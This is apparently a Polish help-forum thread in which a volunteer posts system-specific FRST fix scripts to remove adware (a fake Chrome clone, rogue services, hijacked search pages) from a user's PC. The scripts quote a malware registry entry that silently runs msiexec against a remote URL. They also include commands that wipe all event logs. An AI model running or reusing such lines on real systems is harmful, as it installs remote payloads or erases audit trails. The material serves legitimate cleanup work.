HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{19539992-061C-4E8B-9053-07B175303AF4} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = C:\ProgramData\Microsoft\Phone Tools\CoreCon\12.0\1042\NonSDKAddonLangVer.dll C:\ProgramData\Package Cache\{0C8D9D70-FA5A-4CA9-763F-D8D93BC099B6}v10.1.14393.795\Installers\Universal_CRT_Tools_x86-x86_en-us.dll C:\ProgramData\Package Cache\{137DE25F-7C3C-DEFE-C45B-990088714B67}v12.2.2793.254\Update\install.dll EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Kompleksowo przeinstaluj przeglądarkę Google Chrome: Upewnij się, że nie masz włączonej synchronizacji, która załaduje złe ustawienia z serwera po reinstalacji przeglądarki: KLIK. Jeśli potrzebne, wyeksportuj zakładki: CTRL+SHIFT+O > Organizuj > Eksportuj zakładki do pliku HTML. Odinstaluj Google Chrome. Przy deinstalacji zaznacz Usuń także dane przeglądarki. Zainstaluj najnowszą stabilną wersję Google Chrome: KLIK. 3. Ponów skan Malwarebytes, w przypadku detekcji nie podejmuj żadnej akcji - przedstaw raport w celu przeanalizowania wyników. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Ja nie jestem moderatorem w tym dziale, więc nie mogę przenieść tego tematu do swojego działu, którym się opiekuję (dział pomocy doraźnej, czyli leczenia zainfekowanych platform Microsoft). Później zrobi to inny moderator, który ma tu dostęp. W systemie został podstawiony fałszywy klon Google Chrome Dopig z wbudowanym adware, który całkowicie zastąpił Chrome. Skróty, które uruchamiasz wywołują klon a nie prawdziwe Chrome. Podobnie ma się sytuację z przeglądarką Mozilla FireFox, której nie masz zainstalowanej w oryginalnej wersji, ale adware podstawiło fałszywą. Poza tym, mnóstwo innych aplikacji i modyfikacji adware. Jeśli chodzi zaś o problem tytułowy to on również jest spowodowany przez infekcje, a dokładnie wariant Adware.Elex, który zmodyfikował usługę Themes. Przeczytaj obowiązkową lekturę na temat zabezpieczenia się pod takimi sytuacjami: Portale z oprogramowaniem / Instalatory - na co uważać. 1. Za pomocą narzędzia Program Install and Uninstall Troubleshooter odinstaluj adware / PUP: AlphaGo (trzy pozycje do deinstalacji), amuleC (jedna pozycja to deinstalacji) 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\...\ChromeHTML: -> C:\Program Files (x86)\Dopig\Application\chrome.exe (Google Inc.) C:\Users\Hubert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Program Files (x86)\Dopig C:\Users\Hubert\AppData\Local\Dopig C:\Users\Hubert\AppData\Roaming\Dopig C:\Program Files (x86)\FireFox C:\Users\Hubert\AppData\Local\FireFox C:\Users\Hubert\AppData\Roaming\FireFox DeleteKey: HKCU\Software\Dopig DeleteKey: HKLM\SOFTWARE\WOW6432Node\Dopig DeleteKey: HKCU\Software\Firefox DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku Task: {1CB03AA5-7AC0-4E6C-92FD-87AE62BF1E42} - System32\Tasks\Windows-PG => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\psgo\psgo.ps1 Task: {6CD70A5B-CFF0-436C-A6B0-68C7E9499088} - System32\Tasks\WinTOOL => C:\ProgramData\wintools\WintoolUprI.exe [2017-01-25] () C:\windows\psgo C:\ProgramData\wintools C:\Users\Hubert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\big_bang_empire.lnk C:\Users\Hubert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk MSCONFIG\startupreg: background_fault => "C:\Users\Hubert\AppData\Local\background_fault\aswRD.exe" "C:\Users\Hubert\AppData\Local\background_fault\bf.dll",background_fault_collector MSCONFIG\startupreg: Tv-Plug-In => "C:\Program Files (x86)\Tv-Plug-In\Tv-Plug-In.exe" nogui C:\Users\Hubert\AppData\Local\background_fault HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\...\Run: [CW] => [X] HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj88NWIdRTkxRYMdM8I1OTqyRkIyOWQQFjLWRjM2OUVYNc== /q GroupPolicy\User: Ograniczenia HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1474272565&z=629e3f9ca8d3f5e970e8b8dg1zbm4zbo6mfocwbq3w&from=wpm0616&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1474272565&z=629e3f9ca8d3f5e970e8b8dg1zbm4zbo6mfocwbq3w&from=wpm0616&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1474272565&z=629e3f9ca8d3f5e970e8b8dg1zbm4zbo6mfocwbq3w&from=wpm0616&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494321649&z=56e83df585b09ddfdebb057gdz1t9z3c6oeg4qcz9z&from=che0812&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494321649&z=56e83df585b09ddfdebb057gdz1t9z3c6oeg4qcz9z&from=che0812&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1474272565&z=629e3f9ca8d3f5e970e8b8dg1zbm4zbo6mfocwbq3w&from=wpm0616&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1474272565&z=629e3f9ca8d3f5e970e8b8dg1zbm4zbo6mfocwbq3w&from=wpm0616&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.amisites.com/search/?type=ds&ts=1482829952&z=0e8602fd9c6354b14182cbcgazbb1o1b9obtctczbb&from=archer1028&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494321649&z=56e83df585b09ddfdebb057gdz1t9z3c6oeg4qcz9z&from=che0812&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.amisites.com/search/?type=ds&ts=1482829952&z=0e8602fd9c6354b14182cbcgazbb1o1b9obtctczbb&from=archer1028&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} SearchScopes: HKU\S-1-5-21-2619517641-3271199866-1137362701-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494836168&z=0a75cbe4ae5d67e770e0b7dgdzat2z3beccq8geqam&from=che0812&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} S2 GubedZL; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Corporation) S2 GubZL; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Corporation) S2 Archer; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Corporation) S2 CSHMDR; C:\Users\Hubert\AppData\Local\CSHMDR\Snare.dll [900096 2017-05-22] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 glory; C:\Users\Hubert\AppData\Local\glory\glory.dll [809984 2017-06-02] (glory) [brak podpisu cyfrowego] S2 MSLN; C:\ProgramData\Microsoft\Phone Tools\CoreCon\12.0\1042\NonSDKAddonLangVer.dll [475648 2016-12-28] () [brak podpisu cyfrowego] R2 MVCSrv; C:\ProgramData\Package Cache\{0C8D9D70-FA5A-4CA9-763F-D8D93BC099B6}v10.1.14393.795\Installers\Universal_CRT_Tools_x86-x86_en-us.dll [108544 2017-04-05] () [brak podpisu cyfrowego] S2 Themes; C:\Windows\system32\themeservice.dll [44544 2009-07-14] (Microsoft Corporation) [DependOnService: iThemes5] R2 WinUpdateSrv; C:\ProgramData\Package Cache\{137DE25F-7C3C-DEFE-C45B-990088714B67}v12.2.2793.254\Update\install.dll [104448 2017-05-05] () [brak podpisu cyfrowego] C:\Users\Hubert\AppData\Local\CSHMDR C:\Users\Hubert\AppData\Local\glory VirusTotal: C:\ProgramData\Microsoft\Phone Tools\CoreCon\12.0\1042\NonSDKAddonLangVer.dll VirusTotal: C:\ProgramData\Package Cache\{0C8D9D70-FA5A-4CA9-763F-D8D93BC099B6}v10.1.14393.795\Installers\Universal_CRT_Tools_x86-x86_en-us.dll VirusTotal: C:\ProgramData\Package Cache\{137DE25F-7C3C-DEFE-C45B-990088714B67}v12.2.2793.254\Update\install.dll U0 aswVmm; Brak ImagePath U2 CWASRE; Brak ImagePath U2 snare; Brak ImagePath U3 TBS; Brak ImagePath U2 WinSnare; Brak ImagePath S3 dbx; system32\DRIVERS\dbx.sys [X] S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X] S3 L1C; system32\DRIVERS\L1C62x64.sys [X] S2 CornerSunshineSvc; "C:\Program Files (x86)\Corner Sunshine\CornerSunshineSvc.exe" {8A712DBD-E08B-4D5C-839D-1B9C185FE769} [X] S3 aswHdsKe; \??\C:\Windows\system32\drivers\aswHdsKe.sys [X] 2018-01-02 17:42 - 2018-01-02 17:42 - 000000000 ____D C:\Users\Hubert\AppData\Roaming\Solvusoft 2018-01-02 17:41 - 2018-01-02 17:42 - 000000000 ____D C:\ProgramData\Solvusoft 2018-01-02 18:21 - 2017-04-27 19:01 - 000000000 ____D C:\Windows\system32\1033 2018-01-03 19:12 - 2016-09-19 09:09 - 000000481 _____ C:\Users\Public\Documents\temp.dat 2018-01-02 13:54 - 2016-09-19 09:09 - 000000000 _____ C:\Users\Public\Documents\report.dat 2017-01-13 23:50 - 2017-01-13 23:50 - 000000000 _____ () C:\Program Files (x86)\metadata 2017-01-13 23:50 - 2017-03-04 18:10 - 000000040 _____ () C:\Program Files (x86)\settings.dat C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia Map Viewer\Tibia Map Viewer.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia Map Viewer\Uninstall.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia Map Viewer\View documentation.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia\Tibia Website.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia\Tibia.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia\Uninstall Tibia.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PokerStars.EU\Network Status.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PokerStars.EU\PokerStars.eu.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PokerStars.EU\Uninstall PokerStars.eu.lnk C:\Users\Hubert\Desktop\Karola\Karolina\Connectify.lnk C:\Users\Hubert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Antaris\Antaris.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Hubert\AppData\Local\Mozilla C:\Users\Hubert\AppData\Roaming\Mozilla C:\Users\Hubert\AppData\Roaming\Profiles Reg: reg query HKLM\SYSTEM\CurrentControlSet\Services\Themes /s CMD: netsh advfirewall reset Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Otwórz Google Chrome: Ustawienia > karta Ustawienia > Osoby > Dodaj Osobę > utwórz nową Osobę, zaloguj się na nią > wejdź ponownie do opcji i skasuj wszystkie poprzednie Osoby. 3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). dopig;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 4. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Posty łączę, proszę używać opcji Edytuj jeśli jeszcze nikt nie odpowiedział. Zmiany w wymaganych raportach diagnostycznych GMER został usunięty z obowiązkowych raportów prezentowanych w dziale diagnostyki malware, z następujących powodów: - Trend spadkowy, coraz mniej infekcji tego rodzaju. - Zgodność narzędzia kończy się na Windows 10 RTM, na nowszych edycjach zintensyfikowane dewiacje i problemy. - Dużo fałszywych alarmów, które niepokoją użytkowników. Malware _____________________________________________________________________ C:\Users\Camilo\AppData\Roaming\Football Superstars\BLAT.EXE Size . . . . . . . : 115 200 bytes Age . . . . . . . : 1091.9 days (2015-01-07 19:52:37) Entropy . . . . . : 6.4 SHA-256 . . . . . : AECA4A77D617DA84296B5F857B2821333FE4B9663E8DF74EF5A25A7882693E5E Product . . . . . : Blat Publisher . . . . : http://www.blat.net/ Description . . . : A Win32 command line eMail tool Version . . . . . : 2.6.2 Copyright . . . . : No copyright at all LanguageID . . . . : 1033 > Kaspersky . . . . : not-a-virus:Client-SMTP.Win32.Blat.a Fuzzy . . . . . . : 100.0 To wygląda na fałszywy alarm, detekcje FRST również pominąć (program wykrywany jako podejrzany ze względu na swoje funkcję integracji w system w razie gdyby pomocnik wykrył infekcję). Skasować możesz jedynie pliki cookies. Jak oceniasz obecną sytuację?

To jakieś bardzo szczątkowe wpisy, raczej nie sądzę, że to było tu przyczyną. Akcja ze spoileru wykonana?